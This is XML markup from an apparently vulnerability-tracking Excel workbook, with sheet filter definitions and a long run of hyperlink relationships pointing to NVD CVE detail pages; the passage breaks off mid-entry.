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CVEs'!$A$1:$T$1694</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">'New Today'!$A$1:$T$1679</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">'Significant Updates'!$A$1:$T$1</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="4" hidden="1">'Added to KEV'!$A$1:$T$16</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="5" hidden="1">'KEV - Exploited'!$A$1:$T$19</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="6" hidden="1">'Critical &amp; High'!$A$1:$T$1082</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="7" hidden="1">'Watchlist'!$A$1:$T$507</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="8" hidden="1">'Packages (GHSA-OSV)'!$A$1:$T$110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84869" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81963" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85880" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-60004" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44756" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82004" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12645" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12646" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12647" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12650" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19232" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26084" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48273" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78234" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86464" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12744" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12745" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28606" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49921" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58240" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58822" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61516" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66302" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67631" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67643" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68839" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69276" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69408" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69431" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69463" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69491" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69493" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69496" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69525" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69579" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69586" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69590" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69595" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69715" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69730" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69768" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69769" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69819" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69824" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69829" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69845" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69910" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70296" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71374" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71376" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71377" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72979" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72982" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72983" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73009" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73010" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73025" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77089" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77092" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77098" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77493" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78445" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78509" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78510" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79569" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79570" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79574" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79576" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79577" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65669" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81376" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76969" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82533" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62645" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62647" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69356" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76200" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76201" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78997" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67367" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82067" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84197" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62646" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69641" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73309" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73311" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73312" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75156" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75746" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79571" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86729" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86840" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53581" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66768" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67378" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67636" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69854" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85982" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50093" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12648" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12651" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16502" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18851" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28609" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28618" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28666" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30754" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49879" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49882" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62706" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62744" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62895" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65772" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66814" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66818" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66819" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66820" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67368" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67370" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67373" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67380" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67381" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67384" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67385" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67388" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67638" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67639" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67642" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68775" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68786" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68828" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69266" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69268" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69273" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69282" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69285" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69291" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69334" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69355" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69360" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69386" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69434" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69439" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69442" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69461" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69464" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69465" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69485" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69494" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69495" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69499" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69511" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69518" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69522" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69529" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69547" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69551" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69556" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69598" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69601" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69603" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69614" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 